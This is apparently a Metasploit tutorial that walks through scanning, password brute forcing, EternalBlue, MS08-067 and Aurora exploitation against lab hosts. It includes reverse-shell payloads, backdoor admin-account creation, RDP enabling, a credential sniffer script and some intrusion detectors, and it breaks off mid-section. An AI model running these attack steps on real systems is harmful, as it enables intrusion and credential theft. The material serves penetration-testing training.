1. Introduction to MSF
1.1 What is Metasploit
Metasploit is an exploitation framework. Its full name is The Metasploit Framework, abbreviated MSF.
Metasploit is one of the most widely used penetration-testing tools, not only because it is convenient and powerful, but above all because it is a framework: it lets users write their own exploit modules and test them inside it.
1.2 Terminology
- Exploit
The process by which a tester attacks a vulnerability in a system, program or service.
- Payload
The code the attacker has executed on the target system once the exploit succeeds; typical payloads open a reverse connection, create users or run other system commands.
- Shellcode
A sequence of machine instructions run on the target machine; when it executes successfully it typically returns a shell.
- Module
A software component used within the Metasploit framework (exploit, auxiliary, payload, post, encoder and so on).
- Listener
The component of Metasploit that waits for incoming network connections, for example the reverse connection made by a payload.
2. Metasploit Console
Run msfconsole to open the MSF command-line interface.
Show the help:
help
List exploit modules:
show exploits
List payloads:
show payloads
3. Information Gathering
msfconsole passes commands it does not recognise (whois, nslookup and nmap below) through to the system shell, so those tools must be installed on the attacking host.
3.1 whois lookup
msf5 > whois baidu.com
3.2 nslookup
msf5 > nslookup www.baidu.com
3.4 nmap
msf5 > nmap 192.168.244.131
3.5 portscan module
msf5 > search portscan
msf5 > use auxiliary/scanner/portscan/tcp   # TCP port scan
msf5 auxiliary(scanner/portscan/tcp) > show options   # view the module options
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.244.0/24   # network to scan
rhosts => 192.168.244.0/24
msf5 auxiliary(scanner/portscan/tcp) > setg threads 50   # thread count; setg makes it a global default for later modules too
threads => 50
msf5 auxiliary(scanner/portscan/tcp) > show options   # check the configuration
msf5 auxiliary(scanner/portscan/tcp) > set ports 21-25,80,443,3306,8001-8080   # port ranges to scan
ports => 21-25,80,443,3306,8001-8080
msf5 auxiliary(scanner/portscan/tcp) > show options
3.6 SMB scan
msf5 auxiliary(scanner/portscan/tcp) > search smb_version
msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > show options
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.244.0/24
rhosts => 192.168.244.0/24
msf5 auxiliary(scanner/smb/smb_version) > show options
msf5 auxiliary(scanner/smb/smb_version) > run
3.7 MSSQL scan
msf5 auxiliary(scanner/smb/smb_version) > search mssql_ping
msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/mssql/mssql_ping
msf5 auxiliary(scanner/mssql/mssql_ping) > show options
msf5 auxiliary(scanner/mssql/mssql_ping) > set rhosts 192.168.244.0/24
rhosts => 192.168.244.0/24
msf5 auxiliary(scanner/mssql/mssql_ping) > show options
3.8 SSH scan
msf5 auxiliary(scanner/mssql/mssql_ping) > search ssh_version
msf5 auxiliary(scanner/mssql/mssql_ping) > use auxiliary/scanner/ssh/ssh_version
msf5 auxiliary(scanner/ssh/ssh_version) > show options
msf5 auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.244.0/24
rhosts => 192.168.244.0/24
msf5 auxiliary(scanner/ssh/ssh_version) > show options
msf5 auxiliary(scanner/ssh/ssh_version) > run
The target (CentOS 6.9 x64) had its firewall and SELinux enabled; the SSH banner is returned anyway because the scanner only needs the port the service itself listens on.
3.9 Telnet scan
msf5 auxiliary(scanner/ssh/ssh_version) > search telnet_version
msf5 auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/telnet/telnet_version
msf5 auxiliary(scanner/telnet/telnet_version) > set rhosts 192.168.244.0/24
rhosts => 192.168.244.0/24
msf5 auxiliary(scanner/telnet/telnet_version) > show options
msf5 auxiliary(scanner/telnet/telnet_version) > run
3.10 FTP scan
The target's firewall must allow FTP traffic through.
msf5 auxiliary(scanner/telnet/telnet_version) > search ftp_version
msf5 auxiliary(scanner/telnet/telnet_version) > use 0   # 0 = index of the first search result, here auxiliary/scanner/ftp/ftp_version
msf5 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.244.0/24
rhosts => 192.168.244.0/24
msf5 auxiliary(scanner/ftp/ftp_version) > show options
msf5 auxiliary(scanner/ftp/ftp_version) > run
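As an added example that is not part of the original page or of Metasploit itself, the following Python script reproduces what the portscan/tcp module (3.5) and the banner scanners ssh_version, telnet_version and ftp_version (3.8 to 3.10) do under the hood: it expands an msf-style PORTS specification, connects to each port from a thread pool, and records whatever banner the service sends first. The target is a constructed local listener that answers with an OpenSSH-style banner so the script runs offline; the addresses and the banner string are assumptions.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def parse_ports(spec):
    """Expand an msf-style PORTS value such as '21-25,80,443,3306,8001-8080'
    into a sorted list of unique port numbers."""
    ports = set()
    for part in spec.split(","):
        part = part.strip()
        if not part:
            continue
        lo, _, hi = part.partition("-")
        lo = int(lo)
        hi = int(hi) if hi else lo
        if not (1 <= lo <= hi <= 65535):
            raise ValueError("bad port spec: %r" % part)
        ports.update(range(lo, hi + 1))
    return sorted(ports)


def probe(host, port, timeout=1.0):
    """TCP connect to host:port. Returns (port, banner) when the port is open,
    None when it is closed or filtered. The banner is whatever the service
    volunteers before `timeout` elapses, which is all ssh_version, ftp_version
    and telnet_version need for fingerprinting."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                banner = s.recv(256).decode("ascii", "replace").strip()
            except socket.timeout:
                banner = ""   # open, but the service waits for the client to talk first
            return port, banner
    except OSError:           # ECONNREFUSED, connect timeout (filtered), no route ...
        return None


def scan(host, spec, threads=50, timeout=1.0):
    """Scan every port in `spec` with a pool of `threads` workers (the module's
    THREADS option). Returns {port: banner} for the open ports only."""
    open_ports = {}
    with ThreadPoolExecutor(max_workers=threads) as pool:
        for result in pool.map(lambda p: probe(host, p, timeout), parse_ports(spec)):
            if result is not None:
                open_ports[result[0]] = result[1]
    return open_ports


def start_fake_service(banner, host="127.0.0.1"):
    """Constructed target for an offline run: a listener on an ephemeral port
    that greets every client with `banner` and hangs up. Returns (port, stop)."""
    srv = socket.socket()
    srv.bind((host, 0))
    srv.listen(5)
    srv.settimeout(0.2)
    stop = threading.Event()

    def serve():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            with conn:
                conn.sendall(banner)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], stop.set


if __name__ == "__main__":
    # assumed banner of the CentOS 6 sshd seen in 3.8
    port, stop = start_fake_service(b"SSH-2.0-OpenSSH_5.3\r\n")
    print(scan("127.0.0.1", "21-25,%d" % port, threads=10))
    stop()
```

Closed ports on the loopback interface fail instantly with ECONNREFUSED; a filtered port on a real host costs the full timeout, which is why the module's THREADS value matters for a /24.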
3.11 Scanning for FTP anonymous login
msf5 auxiliary(scanner/ftp/ftp_version) > search ftp/anonymous
msf5 auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/anonymous
msf5 auxiliary(scanner/ftp/anonymous) > set rhosts 192.168.244.0/24
rhosts => 192.168.244.0/24
msf5 auxiliary(scanner/ftp/anonymous) > run
3.12 Host discovery
msf5 > search arp_sweep
msf5 > use auxiliary/scanner/discovery/arp_sweep
msf5 auxiliary(scanner/discovery/arp_sweep) > set rhosts 192.168.244.0/24
rhosts => 192.168.244.0/24
msf5 auxiliary(scanner/discovery/arp_sweep) > show options
msf5 auxiliary(scanner/discovery/arp_sweep) > run
ARP requests do not cross routers, so arp_sweep only finds hosts on the attacker's own layer-2 segment; it needs raw socket access (root) to send them.
3.13 Scanning web directories
msf5 auxiliary(scanner/discovery/arp_sweep) > search dir_scanner
msf5 auxiliary(scanner/discovery/arp_sweep) > use auxiliary/scanner/http/dir_scanner
msf5 auxiliary(scanner/http/dir_scanner) > set rhosts 192.168.244.130
rhosts => 192.168.244.130
msf5 auxiliary(scanner/http/dir_scanner) > run
3.14 Searching for e-mail addresses of a domain
msf5 auxiliary(scanner/http/dir_scanner) > search search_email_collector
msf5 auxiliary(scanner/http/dir_scanner) > use auxiliary/gather/search_email_collector
msf5 auxiliary(gather/search_email_collector) > show options
msf5 auxiliary(gather/search_email_collector) > set domain xxx.com
domain => xxx.com
msf5 auxiliary(gather/search_email_collector) > set SEARCH_GOOGLE false   # use this when Google is not reachable
SEARCH_GOOGLE => false
msf5 auxiliary(gather/search_email_collector) > run
3.15 sniffer (packet capture)
msf5 auxiliary(gather/search_email_collector) > search sniffer
msf5 auxiliary(gather/search_email_collector) > use auxiliary/sniffer/psnuffle
msf5 auxiliary(sniffer/psnuffle) > show options
msf5 auxiliary(sniffer/psnuffle) > run
Start an FTP server with Serv-U, as shown in the figure: psnuffle captures the credentials from the unencrypted FTP traffic. It only sees traffic that reaches the attacker's interface, so the capture requires a shared segment, a mirror port or a prior man-in-the-middle position; FTP, POP3, IMAP and HTTP are among the cleartext protocols psnuffle decodes.
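Added example, not part of the original page or of Metasploit: a stateful FTP credential extractor in Python that does what psnuffle's FTP handler does when it sees the Serv-U traffic above. It reassembles each control-channel flow from TCP segments, pairs every USER with the PASS that follows it, and uses the server's reply code (230 versus 530) to tell a working credential from a failed guess. The packet list is constructed inline so the script runs offline; addresses, ports and credentials in it are made up.

```python
FTP_PORT = 21

# Constructed capture: (src_ip, src_port, dst_ip, dst_port, payload) for the
# control-channel segments of two clients talking to one Serv-U style server.
# The second client's PASS line is deliberately split across two segments.
SAMPLE_PACKETS = [
    ("10.0.0.9", 21, "10.0.0.5", 51000, b"220 Serv-U FTP Server v15.1 ready...\r\n"),
    ("10.0.0.5", 51000, "10.0.0.9", 21, b"USER alice\r\n"),
    ("10.0.0.9", 21, "10.0.0.5", 51000, b"331 User name okay, need password.\r\n"),
    ("10.0.0.5", 51000, "10.0.0.9", 21, b"PASS wrong-guess\r\n"),
    ("10.0.0.9", 21, "10.0.0.5", 51000, b"530 Not logged in.\r\n"),
    ("10.0.0.5", 51000, "10.0.0.9", 21, b"USER alice\r\n"),
    ("10.0.0.9", 21, "10.0.0.5", 51000, b"331 User name okay, need password.\r\n"),
    ("10.0.0.5", 51000, "10.0.0.9", 21, b"PASS s3cret!\r\n"),
    ("10.0.0.9", 21, "10.0.0.5", 51000, b"230 User logged in, proceed.\r\n"),
    ("10.0.0.7", 40200, "10.0.0.9", 21, b"USER bob\r\nPASS hun"),
    ("10.0.0.7", 40200, "10.0.0.9", 21, b"ter2\r\n"),
    ("10.0.0.9", 21, "10.0.0.7", 40200, b"230 User logged in, proceed.\r\n"),
]

SUCCESS = {"230"}                 # login accepted
FAILURE = {"530", "421", "430"}   # rejected / service unavailable


def sniff_ftp(packets, ftp_port=FTP_PORT):
    """Extract USER/PASS pairs from ordered FTP control-channel segments and
    grade each pair with the server's reply. Returns a list of dicts."""
    flows = {}      # (client, server) -> per-flow state
    results = []
    for src, sport, dst, dport, payload in packets:
        if dport == ftp_port:
            key, direction = ((src, sport), (dst, dport)), "c2s"
        elif sport == ftp_port:
            key, direction = ((dst, dport), (src, sport)), "s2c"
        else:
            continue    # not FTP control traffic
        st = flows.setdefault(key, {"c2s": b"", "s2c": b"", "user": None, "attempt": None})
        st[direction] += payload
        # Only complete CRLF-terminated lines are parsed; a partial tail stays
        # buffered until the next segment of the same flow arrives.
        *lines, st[direction] = st[direction].split(b"\r\n")
        for raw in lines:
            line = raw.decode("utf-8", "replace")
            if direction == "c2s":
                verb, _, arg = line.partition(" ")
                verb = verb.upper()
                if verb == "USER":
                    st["user"] = arg
                elif verb == "PASS" and st["user"] is not None:
                    st["attempt"] = {"client": key[0][0], "server": key[1][0],
                                     "user": st["user"], "password": arg, "status": "unknown"}
                    results.append(st["attempt"])
            elif st["attempt"] is not None:
                # The first server reply after PASS is the verdict on that attempt.
                code = line[:3]
                if code in SUCCESS:
                    st["attempt"]["status"] = "success"
                elif code in FAILURE:
                    st["attempt"]["status"] = "failed"
                st["attempt"] = None
    return results


if __name__ == "__main__":
    for r in sniff_ftp(SAMPLE_PACKETS):
        print("%(client)s -> %(server)s  %(user)s:%(password)s  [%(status)s]" % r)
```

Grading by reply code is what separates a useful capture from noise: a wordlist attack against the same server produces hundreds of USER/PASS pairs, and only the ones answered with 230 are worth reporting.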
4. Password Cracking with MSF
4.1 SSH password guessing
msf5 > search ssh_login
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > show options
msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file /tmp/sshpass.txt
pass_file => /tmp/sshpass.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set username root
username => root
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.244.132
rhosts => 192.168.244.132
msf5 auxiliary(scanner/ssh/ssh_login) > show options
msf5 auxiliary(scanner/ssh/ssh_login) > run
Each correct credential automatically opens a command-shell session on the target:
msf5 auxiliary(scanner/ssh/ssh_login) > sessions -l
msf5 auxiliary(scanner/ssh/ssh_login) > sessions -i 1   # 1 is the session ID
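Added example for the detection side, not from the original page or from Metasploit: a Python detector that reads the sshd lines ssh_login leaves in /var/log/secure (auth.log) on the CentOS target, raises an alert when one source accumulates five failed password attempts inside a 60-second window, and escalates when the same source then logs in successfully, which is exactly the trace a wordlist hit leaves behind. The log excerpt is constructed; host name, PIDs and timestamps are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed /var/log/secure excerpt of the kind ssh_login leaves on a
# CentOS 6 target: one "Failed password" per wordlist entry from one source,
# then an "Accepted password" when the list contains the real password.
SAMPLE_AUTH_LOG = """\
Nov  3 10:15:01 centos sshd[2201]: Failed password for root from 192.168.244.128 port 40210 ssh2
Nov  3 10:15:01 centos sshd[2203]: Failed password for root from 192.168.244.128 port 40212 ssh2
Nov  3 10:15:02 centos sshd[2205]: Failed password for root from 192.168.244.128 port 40214 ssh2
Nov  3 10:15:02 centos sshd[2207]: Failed password for invalid user admin from 192.168.244.128 port 40216 ssh2
Nov  3 10:15:03 centos sshd[2209]: Failed password for root from 192.168.244.128 port 40218 ssh2
Nov  3 10:15:03 centos sshd[2211]: Accepted password for root from 192.168.244.128 port 40220 ssh2
Nov  3 10:20:44 centos sshd[2300]: Accepted publickey for deploy from 192.168.244.10 port 51022 ssh2
Nov  3 10:21:05 centos sshd[2310]: Failed password for deploy from 192.168.244.10 port 51030 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return alerts as (kind, source_ip, user, timestamp) tuples.
    'bruteforce' fires once per source when `threshold` failed password
    attempts fall inside a sliding window of `window_seconds`;
    'bruteforce_success' fires when such a source then logs in."""
    failures = defaultdict(list)   # source ip -> timestamps of recent failures
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue               # other sshd noise, not a login result
        # syslog timestamps carry no year; a relative window does not need one
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            recent = [t for t in failures[ip] if (ts - t).total_seconds() <= window_seconds]
            recent.append(ts)
            failures[ip] = recent
            if len(recent) == threshold:   # fire exactly when the threshold is crossed
                alerts.append(("bruteforce", ip, user, ts))
        elif len(failures[ip]) >= threshold:
            # a success from a source that was just hammering the service: a credential hit
            alerts.append(("bruteforce_success", ip, user, ts))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

Keying on the source address rather than on the user name matters because ssh_login can spray many user names from one host, and the "invalid user" variant of the log line is included for the same reason.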
4.2 MySQL password attack
The target is Metasploitable2.
msf5 > search mysql_login
msf5 > use auxiliary/scanner/mysql/mysql_login
msf5 auxiliary(scanner/mysql/mysql_login) > set rhosts 192.168.244.136
rhosts => 192.168.244.136
msf5 auxiliary(scanner/mysql/mysql_login) > set user_file /root/username.txt
user_file => /root/username.txt
msf5 auxiliary(scanner/mysql/mysql_login) > set pass_file /root/password.txt
pass_file => /root/password.txt
msf5 auxiliary(scanner/mysql/mysql_login) > exploit
4.3 PostgreSQL password attack
msf5 > search postgres_login
msf5 auxiliary(scanner/mysql/mysql_login) > use auxiliary/scanner/postgres/postgres_login
msf5 auxiliary(scanner/postgres/postgres_login) > set rhosts 192.168.244.136
rhosts => 192.168.244.136
msf5 auxiliary(scanner/postgres/postgres_login) > set user_file /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt
user_file => /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt
msf5 auxiliary(scanner/postgres/postgres_login) > set pass_file /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt
pass_file => /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt
msf5 auxiliary(scanner/postgres/postgres_login) > exploit
4.4 Tomcat attack
Tomcat ships with a management application; its default address is http://IP:port/manager/html. Through it, web applications can be deployed, started, stopped or undeployed without restarting Tomcat. A badly configured manager (default or weak credentials reachable from the network) is therefore a serious exposure: an attacker who can log in can deploy a WAR file and take over the server quickly and easily.
The target is Metasploitable2.
msf5 > search tomcat_mgr_login
msf5 > use auxiliary/scanner/http/tomcat_mgr_login
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set pass_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
pass_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set user_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
user_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.244.136
rhosts => 192.168.244.136
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180   # Metasploitable2 runs Tomcat on 8180, not 8080
rport => 8180
msf5 auxiliary(scanner/http/tomcat_mgr_login) > exploit
4.5 Attacking the Telnet service
The target is Metasploitable2.
msf5 > search telnet_version
msf5 auxiliary(scanner/http/tomcat_mgr_login) > use auxiliary/scanner/telnet/telnet_version
msf5 auxiliary(scanner/telnet/telnet_version) > set rhosts 192.168.244.136
rhosts => 192.168.244.136
msf5 auxiliary(scanner/telnet/telnet_version) > exploit
telnet_version only reads the service banner; password guessing against Telnet is done with auxiliary/scanner/telnet/telnet_login, configured with user_file and pass_file in the same way as ssh_login above.
4.6 Attacking the Samba service
msf5 > search smb_version
msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.244.136
rhosts => 192.168.244.136
msf5 auxiliary(scanner/smb/smb_version) > exploit
smb_version only identifies the SMB implementation and operating system. If a valid username and password are later brute-forced over SMB (auxiliary/scanner/smb/smb_login) and the target does not have RDP enabled, a shell can still be obtained over SMB with Sysinternals PsExec: psexec.exe \\<target address> -u administrator -p 1234567 cmd.exe (-u and -p supply the account; the -l switch would instead run the command with a limited token). Metasploit's exploit/windows/smb/psexec does the same thing with the SMBUser and SMBPass options.
5. Exploitation with Metasploit
5.1 ms17-010 exploitation
Target: cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso
(1) Scan the host for the vulnerability
root@kali:~# nmap --script "smb-vuln*" 192.168.244.137
(2) Exploit ms17-010 with msf
msf5 auxiliary(scanner/discovery/arp_sweep) > search ms17-010
msf5 auxiliary(scanner/discovery/arp_sweep) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.244.137
rhosts => 192.168.244.137
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
A successful run ends in a session on the target running as SYSTEM. If it is a meterpreter session, run shell to get the cmd prompt used below.
Check the current user
C:\Windows\system32>whoami
Add a user
C:\Windows\system32>net user sys 123 /add
Add the new user to the local Administrators group
C:\Windows\system32>net localgroup administrators sys /add
Set the Remote Desktop port (3389 is already the default; the command only makes it explicit)
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
Enable Remote Desktop
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
# Disable Remote Desktop
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0
Check that port 3389 is listening
netstat -an|find "3389"
If the Windows firewall is on, the Remote Desktop rule group must also be allowed before 3389 is reachable from outside; on this target the connection succeeded as shown below. The account creation and the group change are recorded in the Windows Security log (events 4720 and 4732), so this style of persistence is easy to spot after the fact.
Connect to Windows over RDP from Kali with rdesktop
# install rdesktop if it is missing
apt-get install rdesktop
RDP from Kali to the Windows target (-f full screen, -a 16 for 16-bit colour depth); log in as the sys user created above
root@kali:~# rdesktop -f -a 16 192.168.244.137
Connected successfully.
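Added example, not the page's own material: the Windows-side detection for the persistence steps just shown. When whoever holds the EternalBlue SYSTEM shell runs net user ... /add and net localgroup administrators ... /add, the Security log records event 4720 (user account created) followed by 4732 (member added to a security-enabled local group), and the subject of both is the computer account because the shell runs as SYSTEM rather than as a logged-on administrator. The Python below correlates the two events by SID and flags a new account that lands in Administrators within ten minutes of its creation, as well as any account created by a machine account. The event records are constructed in the flattened form a log shipper emits from the event XML; names, SIDs and times are made up.

```python
from datetime import datetime

# Constructed Security-log records in the flattened shape a log shipper produces
# from the event XML (EventID plus the EventData fields that matter here).
SAMPLE_EVENTS = [
    {"time": "2019-11-03T10:30:12", "EventID": 4624, "SubjectUserName": "-",
     "TargetUserName": "ANONYMOUS LOGON"},
    {"time": "2019-11-03T10:31:40", "EventID": 4720, "SubjectUserName": "WIN7-PC$",
     "TargetUserName": "sys", "TargetSid": "S-1-5-21-1111111111-2222222222-3333333333-1005"},
    {"time": "2019-11-03T10:31:41", "EventID": 4732, "SubjectUserName": "WIN7-PC$",
     "TargetUserName": "Administrators",
     "MemberSid": "S-1-5-21-1111111111-2222222222-3333333333-1005"},
    {"time": "2019-11-03T14:02:00", "EventID": 4720, "SubjectUserName": "helpdesk",
     "TargetUserName": "jdoe", "TargetSid": "S-1-5-21-1111111111-2222222222-3333333333-1006"},
    {"time": "2019-11-04T09:00:00", "EventID": 4732, "SubjectUserName": "helpdesk",
     "TargetUserName": "Remote Desktop Users",
     "MemberSid": "S-1-5-21-1111111111-2222222222-3333333333-1006"},
]

ADMIN_GROUPS = {"Administrators"}


def correlate_account_creation(events, window_seconds=600):
    """Return alerts as (kind, account, detail) tuples.
    'account_created_by_system': a 4720 whose subject is a machine account
        (name ends in '$'), i.e. created from a SYSTEM context such as an
        exploit shell rather than by an administrator's logon session.
    'new_local_admin': a 4732 that adds, within `window_seconds` of its 4720,
        a freshly created account (matched by SID) to an administrative group."""
    created = {}   # SID -> (creation time, account name)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if ev["EventID"] == 4720:
            created[ev["TargetSid"]] = (t, ev["TargetUserName"])
            if ev["SubjectUserName"].endswith("$"):
                alerts.append(("account_created_by_system", ev["TargetUserName"],
                               ev["SubjectUserName"]))
        elif ev["EventID"] == 4732 and ev["TargetUserName"] in ADMIN_GROUPS:
            # 4732 carries the member as a SID (MemberName is often '-'), so
            # the join key is the SID the 4720 reported for the new account.
            hit = created.get(ev["MemberSid"])
            if hit is not None and (t - hit[0]).total_seconds() <= window_seconds:
                alerts.append(("new_local_admin", hit[1], ev["TargetUserName"]))
    return alerts


if __name__ == "__main__":
    for alert in correlate_account_creation(SAMPLE_EVENTS):
        print(alert)
```

The helpdesk records in the sample show the benign case the rule must not fire on: a human administrator creating an account and, much later, adding it to a non-administrative group.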
5.2 ms08-067 exploitation
Target: Windows XP (with SMB enabled on port 445)
(1) Scan the host for the vulnerability with nmap
root@kali:~# nmap --script "smb-vuln*" 192.168.244.138
Fingerprint the target operating system (the module needs the exact version and language to pick its target)
root@kali:~# nmap -O 192.168.244.138
(2) Exploit ms08-067 with msf
msf5 > search ms08-067
msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > show options
Set the target host
msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.244.138
List the exploit targets:
msf5 exploit(windows/smb/ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   5   Windows XP SP2 English (NX)
   6   Windows XP SP3 English (AlwaysOn NX)
   7   Windows XP SP3 English (NX)
   8   Windows XP SP2 Arabic (NX)
   9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
   10  Windows XP SP2 Chinese - Simplified (NX)
   11  Windows XP SP2 Chinese - Traditional (NX)
   12  Windows XP SP2 Czech (NX)
   13  Windows XP SP2 Danish (NX)
   14  Windows XP SP2 German (NX)
   15  Windows XP SP2 Greek (NX)
   16  Windows XP SP2 Spanish (NX)
   17  Windows XP SP2 Finnish (NX)
   18  Windows XP SP2 French (NX)
   19  Windows XP SP2 Hebrew (NX)
   20  Windows XP SP2 Hungarian (NX)
   21  Windows XP SP2 Italian (NX)
   22  Windows XP SP2 Japanese (NX)
   23  Windows XP SP2 Korean (NX)
   24  Windows XP SP2 Dutch (NX)
   25  Windows XP SP2 Norwegian (NX)
   26  Windows XP SP2 Polish (NX)
   27  Windows XP SP2 Portuguese - Brazilian (NX)
   28  Windows XP SP2 Portuguese (NX)
   29  Windows XP SP2 Russian (NX)
   30  Windows XP SP2 Swedish (NX)
   31  Windows XP SP2 Turkish (NX)
   32  Windows XP SP3 Arabic (NX)
   33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
   34  Windows XP SP3 Chinese - Simplified (NX)
   35  Windows XP SP3 Chinese - Traditional (NX)
   36  Windows XP SP3 Czech (NX)
   37  Windows XP SP3 Danish (NX)
   38  Windows XP SP3 German (NX)
   39  Windows XP SP3 Greek (NX)
   40  Windows XP SP3 Spanish (NX)
   41  Windows XP SP3 Finnish (NX)
   42  Windows XP SP3 French (NX)
   43  Windows XP SP3 Hebrew (NX)
   44  Windows XP SP3 Hungarian (NX)
   45  Windows XP SP3 Italian (NX)
   46  Windows XP SP3 Japanese (NX)
   47  Windows XP SP3 Korean (NX)
   48  Windows XP SP3 Dutch (NX)
   49  Windows XP SP3 Norwegian (NX)
   50  Windows XP SP3 Polish (NX)
   51  Windows XP SP3 Portuguese - Brazilian (NX)
   52  Windows XP SP3 Portuguese (NX)
   53  Windows XP SP3 Russian (NX)
   54  Windows XP SP3 Swedish (NX)
   55  Windows XP SP3 Turkish (NX)
   56  Windows 2003 SP1 English (NO NX)
   57  Windows 2003 SP1 English (NX)
   58  Windows 2003 SP1 Japanese (NO NX)
   59  Windows 2003 SP1 Spanish (NO NX)
   60  Windows 2003 SP1 Spanish (NX)
   61  Windows 2003 SP1 French (NO NX)
   62  Windows 2003 SP1 French (NX)
   63  Windows 2003 SP2 English (NO NX)
   64  Windows 2003 SP2 English (NX)
   65  Windows 2003 SP2 German (NO NX)
   66  Windows 2003 SP2 German (NX)
   67  Windows 2003 SP2 Portuguese - Brazilian (NX)
   68  Windows 2003 SP2 Spanish (NO NX)
   69  Windows 2003 SP2 Spanish (NX)
   70  Windows 2003 SP2 Japanese (NO NX)
   71  Windows 2003 SP2 French (NO NX)
   72  Windows 2003 SP2 French (NX)
Set the target (the victim is Windows XP SP3 Simplified Chinese, so target 34)
msf5 exploit(windows/smb/ms08_067_netapi) > set target 34
Check the configuration
msf5 exploit(windows/smb/ms08_067_netapi) > show options
Set a meterpreter payload
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > show options
Set the listener address
msf5 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.244.128   # address the victim connects back to (a public address in a real engagement); here the Kali IP
lhost => 192.168.244.128
msf5 exploit(windows/smb/ms08_067_netapi) > set lport 1122   # port the victim connects back to
lport => 1122
msf5 exploit(windows/smb/ms08_067_netapi) > show options
msf5 exploit(windows/smb/ms08_067_netapi) > run
Process migration / process injection (moves meterpreter into a more stable, longer-lived process)
meterpreter > ps
meterpreter > migrate 660   # 660 = PID chosen from the ps output
Start VNC
meterpreter > run vnc
Get a system cmd shell
meterpreter > shell
Background the session
meterpreter > background
List backgrounded sessions
msf5 exploit(windows/smb/ms08_067_netapi) > sessions -l
Interact with a session
msf5 exploit(windows/smb/ms08_067_netapi) > sessions -i 1
5.3 ms10_002 Internet Explorer vulnerability (Aurora)
msf5 exploit(windows/smb/ms08_067_netapi) > search ms10_002_aurora
msf5 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/browser/ms10_002_aurora
msf5 exploit(windows/browser/ms10_002_aurora) > show options
Set SRVHOST (the Kali address the malicious page is served from, which the victim must be able to reach) and SRVPORT
msf5 exploit(windows/browser/ms10_002_aurora) > set srvhost 192.168.244.128
srvhost => 192.168.244.128
msf5 exploit(windows/browser/ms10_002_aurora) > set srvport 8080
srvport => 8080
Set the meterpreter payload
msf5 exploit(windows/browser/ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
Set the listener address (Kali IP)
msf5 exploit(windows/browser/ms10_002_aurora) > set lhost 192.168.244.128
lhost => 192.168.244.128
msf5 exploit(windows/browser/ms10_002_aurora) > set lport 1123
lport => 1123
msf5 exploit(windows/browser/ms10_002_aurora) > show options
Target: no need to set (the default is fine)
Start
